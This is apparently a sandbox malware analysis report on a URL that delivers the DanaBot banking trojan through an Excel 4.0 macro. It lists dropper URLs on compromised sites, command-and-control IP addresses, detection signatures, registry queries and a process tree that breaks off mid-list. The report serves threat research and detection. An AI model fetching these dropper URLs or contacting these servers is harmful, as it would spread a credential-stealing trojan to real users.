danabot | hxxp://aiowdjwaiojd[.]com

Resubmissions

20-01-2025 18:54

250120-xkkv4atmez 3

20-01-2025 18:51

250120-xhzapstkdn 10

Analysis

max time kernel
133s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
20-01-2025 18:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://aiowdjwaiojd.com

Score

10^/10

danabot banker botnet discovery macro trojan xlm

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://blockchainjoblist.com/wp-admin/014080/

exe.dropper

https://womenempowermentpakistan.com/wp-admin/paba5q52/

exe.dropper

https://atnimanvilla.com/wp-content/073735/

exe.dropper

https://yeuquynhnhai.com/upload/41830/

exe.dropper

https://deepikarai.com/js/4bzs6/

Extracted

Family

danabot

51.178.195.151

51.222.39.81

149.255.35.125

38.68.50.179

51.77.7.204

rsa_pubkey.plain

Signatures

Danabot
Danabot is a modular banking Trojan that has been linked with other malware.
trojan banker danabot
Danabot family
danabot

Danabot x86 payload 1 IoCs

Detection of Danabot x86 payload, mapped in memory during the execution of its loader.

botnet

resource	yara_rule
behavioral1/files/0x0008000000023e26-1262.dat	family_danabot

Process spawned unexpected child process 3 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4812	3800	powershell.exe	104
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	5272	312	rundll32.exe	182
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	3076	312	rundll32.exe	182

Blocklisted process makes network request 7 IoCs

flow	pid	Process
193	5668	rundll32.exe
210	4812	powershell.exe
211	5668	rundll32.exe
212	5668	rundll32.exe
273	4812	powershell.exe
276	4812	powershell.exe
281	5668	rundll32.exe

Downloads MZ/PE file

Suspicious Office macro 1 IoCs

Office document equipped with 4.0 macros.

macro xlm

resource	yara_rule
behavioral1/files/0x0009000000023e54-1573.dat	office_xlm_macros

Executes dropped EXE 1 IoCs

pid	Process
464	DanaBot.exe

Loads dropped DLL 3 IoCs

pid	Process
4112	regsvr32.exe
4112	regsvr32.exe
5668	rundll32.exe

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\H:	EXCEL.EXE
File opened (read-only)	\??\S:	EXCEL.EXE
File opened (read-only)	\??\T:	EXCEL.EXE
File opened (read-only)	\??\W:	EXCEL.EXE
File opened (read-only)	\??\G:	EXCEL.EXE
File opened (read-only)	\??\I:	EXCEL.EXE
File opened (read-only)	\??\M:	EXCEL.EXE
File opened (read-only)	\??\V:	EXCEL.EXE
File opened (read-only)	\??\J:	EXCEL.EXE
File opened (read-only)	\??\K:	EXCEL.EXE
File opened (read-only)	\??\N:	EXCEL.EXE
File opened (read-only)	\??\P:	EXCEL.EXE
File opened (read-only)	\??\R:	EXCEL.EXE
File opened (read-only)	\??\Z:	EXCEL.EXE
File opened (read-only)	\??\U:	EXCEL.EXE
File opened (read-only)	\??\X:	EXCEL.EXE
File opened (read-only)	\??\A:	EXCEL.EXE
File opened (read-only)	\??\B:	EXCEL.EXE
File opened (read-only)	\??\E:	EXCEL.EXE
File opened (read-only)	\??\L:	EXCEL.EXE
File opened (read-only)	\??\O:	EXCEL.EXE
File opened (read-only)	\??\Q:	EXCEL.EXE
File opened (read-only)	\??\Y:	EXCEL.EXE

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service

T1102

flow	ioc
140	raw.githubusercontent.com
141	raw.githubusercontent.com
147	discord.com
148	discord.com
149	discord.com

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Program crash 1 IoCs

pid	pid_target	Process	procid_target
5116	464	WerFault.exe	155

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DanaBot.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regsvr32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe

Checks processor information in registry 2 TTPs 12 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE

Enumerates system info in registry 2 TTPs 15 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-493223053-2004649691-1575712786-1000\{1AF2B20A-A676-4D8E-BAF8-44E8FAD1A8CD}	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings	msedge.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 659664.crdownload:SmartScreen	msedge.exe

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
4892	WINWORD.EXE
4892	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 31 IoCs

pid	Process
1976	msedge.exe
1976	msedge.exe
4928	msedge.exe
4928	msedge.exe
4936	identity_helper.exe
4936	identity_helper.exe
5712	msedge.exe
5712	msedge.exe
1836	msedge.exe
1836	msedge.exe
2304	msedge.exe
2304	msedge.exe
6052	msedge.exe
6052	msedge.exe
5836	msedge.exe
5836	msedge.exe
4812	powershell.exe
4812	powershell.exe
4812	powershell.exe
5624	msedge.exe
5624	msedge.exe
5896	msedge.exe
5896	msedge.exe
5372	msedge.exe
5372	msedge.exe
5372	msedge.exe
5372	msedge.exe
5764	EXCEL.EXE
5764	EXCEL.EXE
212	EXCEL.EXE
212	EXCEL.EXE

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 37 IoCs

pid	Process
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: 33	5380	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	5380	AUDIODG.EXE
Token: SeDebugPrivilege	4812	powershell.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4892	WINWORD.EXE
4892	WINWORD.EXE
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe
4928	msedge.exe

Suspicious use of SetWindowsHookEx 43 IoCs

pid	Process
4892	WINWORD.EXE
4892	WINWORD.EXE
4892	WINWORD.EXE
4892	WINWORD.EXE
4892	WINWORD.EXE
4892	WINWORD.EXE
4892	WINWORD.EXE
4892	WINWORD.EXE
4892	WINWORD.EXE
4892	WINWORD.EXE
4892	WINWORD.EXE
4892	WINWORD.EXE
4892	WINWORD.EXE
4892	WINWORD.EXE
4892	WINWORD.EXE
4892	WINWORD.EXE
4892	WINWORD.EXE
312	EXCEL.EXE
312	EXCEL.EXE
312	EXCEL.EXE
312	EXCEL.EXE
5764	EXCEL.EXE
312	EXCEL.EXE
312	EXCEL.EXE
312	EXCEL.EXE
312	EXCEL.EXE
312	EXCEL.EXE
312	EXCEL.EXE
312	EXCEL.EXE
312	EXCEL.EXE
212	EXCEL.EXE
312	EXCEL.EXE
312	EXCEL.EXE
312	EXCEL.EXE
312	EXCEL.EXE
312	EXCEL.EXE
312	EXCEL.EXE
312	EXCEL.EXE
312	EXCEL.EXE
312	EXCEL.EXE
312	EXCEL.EXE
312	EXCEL.EXE
312	EXCEL.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4928 wrote to memory of 412	4928	msedge.exe	83
PID 4928 wrote to memory of 412	4928	msedge.exe	83
PID 4928 wrote to memory of 608	4928	msedge.exe	84
PID 4928 wrote to memory of 608	4928	msedge.exe	84
PID 4928 wrote to memory of 608	4928	msedge.exe	84
PID 4928 wrote to memory of 608	4928	msedge.exe	84
PID 4928 wrote to memory of 608	4928	msedge.exe	84
PID 4928 wrote to memory of 608	4928	msedge.exe	84
PID 4928 wrote to memory of 608	4928	msedge.exe	84
PID 4928 wrote to memory of 608	4928	msedge.exe	84
PID 4928 wrote to memory of 608	4928	msedge.exe	84
PID 4928 wrote to memory of 608	4928	msedge.exe	84
PID 4928 wrote to memory of 608	4928	msedge.exe	84
PID 4928 wrote to memory of 608	4928	msedge.exe	84
PID 4928 wrote to memory of 608	4928	msedge.exe	84
PID 4928 wrote to memory of 608	4928	msedge.exe	84
PID 4928 wrote to memory of 608	4928	msedge.exe	84
PID 4928 wrote to memory of 608	4928	msedge.exe	84
PID 4928 wrote to memory of 608	4928	msedge.exe	84
PID 4928 wrote to memory of 608	4928	msedge.exe	84
PID 4928 wrote to memory of 608	4928	msedge.exe	84
PID 4928 wrote to memory of 608	4928	msedge.exe	84
PID 4928 wrote to memory of 608	4928	msedge.exe	84
PID 4928 wrote to memory of 608	4928	msedge.exe	84
PID 4928 wrote to memory of 608	4928	msedge.exe	84
PID 4928 wrote to memory of 608	4928	msedge.exe	84
PID 4928 wrote to memory of 608	4928	msedge.exe	84
PID 4928 wrote to memory of 608	4928	msedge.exe	84
PID 4928 wrote to memory of 608	4928	msedge.exe	84
PID 4928 wrote to memory of 608	4928	msedge.exe	84
PID 4928 wrote to memory of 608	4928	msedge.exe	84
PID 4928 wrote to memory of 608	4928	msedge.exe	84
PID 4928 wrote to memory of 608	4928	msedge.exe	84
PID 4928 wrote to memory of 608	4928	msedge.exe	84
PID 4928 wrote to memory of 608	4928	msedge.exe	84
PID 4928 wrote to memory of 608	4928	msedge.exe	84
PID 4928 wrote to memory of 608	4928	msedge.exe	84
PID 4928 wrote to memory of 608	4928	msedge.exe	84
PID 4928 wrote to memory of 608	4928	msedge.exe	84
PID 4928 wrote to memory of 608	4928	msedge.exe	84
PID 4928 wrote to memory of 608	4928	msedge.exe	84
PID 4928 wrote to memory of 608	4928	msedge.exe	84
PID 4928 wrote to memory of 1976	4928	msedge.exe	85
PID 4928 wrote to memory of 1976	4928	msedge.exe	85
PID 4928 wrote to memory of 3140	4928	msedge.exe	86
PID 4928 wrote to memory of 3140	4928	msedge.exe	86
PID 4928 wrote to memory of 3140	4928	msedge.exe	86
PID 4928 wrote to memory of 3140	4928	msedge.exe	86
PID 4928 wrote to memory of 3140	4928	msedge.exe	86
PID 4928 wrote to memory of 3140	4928	msedge.exe	86
PID 4928 wrote to memory of 3140	4928	msedge.exe	86
PID 4928 wrote to memory of 3140	4928	msedge.exe	86
PID 4928 wrote to memory of 3140	4928	msedge.exe	86
PID 4928 wrote to memory of 3140	4928	msedge.exe	86
PID 4928 wrote to memory of 3140	4928	msedge.exe	86
PID 4928 wrote to memory of 3140	4928	msedge.exe	86
PID 4928 wrote to memory of 3140	4928	msedge.exe	86
PID 4928 wrote to memory of 3140	4928	msedge.exe	86
PID 4928 wrote to memory of 3140	4928	msedge.exe	86
PID 4928 wrote to memory of 3140	4928	msedge.exe	86
PID 4928 wrote to memory of 3140	4928	msedge.exe	86
PID 4928 wrote to memory of 3140	4928	msedge.exe	86
PID 4928 wrote to memory of 3140	4928	msedge.exe	86
PID 4928 wrote to memory of 3140	4928	msedge.exe	86

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument http://aiowdjwaiojd.com
1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4928
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc825846f8,0x7ffc82584708,0x7ffc82584718
  2⤵
  PID:412
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,13735047159775888230,11339627551442669294,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2132 /prefetch:2
  2⤵
  PID:608
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,13735047159775888230,11339627551442669294,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2304 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1976
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2140,13735047159775888230,11339627551442669294,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2904 /prefetch:8
  2⤵
  PID:3140
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13735047159775888230,11339627551442669294,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1
  2⤵
  PID:3392
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13735047159775888230,11339627551442669294,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
  2⤵
  PID:3896
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13735047159775888230,11339627551442669294,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4400 /prefetch:1
  2⤵
  PID:208
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13735047159775888230,11339627551442669294,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3740 /prefetch:1
  2⤵
  PID:1876
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,13735047159775888230,11339627551442669294,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4532 /prefetch:8
  2⤵
  PID:1752
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,13735047159775888230,11339627551442669294,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4532 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4936
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13735047159775888230,11339627551442669294,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4560 /prefetch:1
  2⤵
  PID:5004
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13735047159775888230,11339627551442669294,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4616 /prefetch:1
  2⤵
  PID:4856
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13735047159775888230,11339627551442669294,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1
  2⤵
  PID:212
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13735047159775888230,11339627551442669294,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4508 /prefetch:1
  2⤵
  PID:3480
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13735047159775888230,11339627551442669294,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3532 /prefetch:1
  2⤵
  PID:4656
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13735047159775888230,11339627551442669294,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5724 /prefetch:1
  2⤵
  PID:1540
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13735047159775888230,11339627551442669294,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5480 /prefetch:1
  2⤵
  PID:1324
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13735047159775888230,11339627551442669294,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3588 /prefetch:1
  2⤵
  PID:1028
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13735047159775888230,11339627551442669294,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5752 /prefetch:1
  2⤵
  PID:1836
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13735047159775888230,11339627551442669294,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5920 /prefetch:1
  2⤵
  PID:1752
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13735047159775888230,11339627551442669294,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5072 /prefetch:1
  2⤵
  PID:388
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2140,13735047159775888230,11339627551442669294,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3708 /prefetch:8
  2⤵
  PID:464
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13735047159775888230,11339627551442669294,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1864 /prefetch:1
  2⤵
  PID:4232
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13735047159775888230,11339627551442669294,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5660 /prefetch:1
  2⤵
  PID:1628
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13735047159775888230,11339627551442669294,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6092 /prefetch:1
  2⤵
  PID:1064
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13735047159775888230,11339627551442669294,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6540 /prefetch:1
  2⤵
  PID:2452
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
